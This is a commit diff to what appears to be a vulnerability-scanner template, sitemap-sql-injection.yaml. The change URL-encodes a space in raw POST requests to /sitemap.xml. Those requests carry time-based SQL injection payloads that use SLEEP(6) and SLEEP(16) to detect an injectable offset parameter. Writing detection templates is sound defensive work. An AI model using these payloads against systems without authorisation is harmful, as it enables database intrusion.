Update sitemap-sql-injection.yaml
parent
a068bf6283
commit
94f55f8141
|
@ -14,12 +14,12 @@ http:
|
|||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1
|
||||
POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(6)),1,2356)# HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout: 25s
|
||||
POST /sitemap.xml?offset=1;SELECT IF((SLEEP(16)),1,2356)# HTTP/1.1
|
||||
POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(16)),1,2356)# HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
|
|
Loading…
Reference in New Issue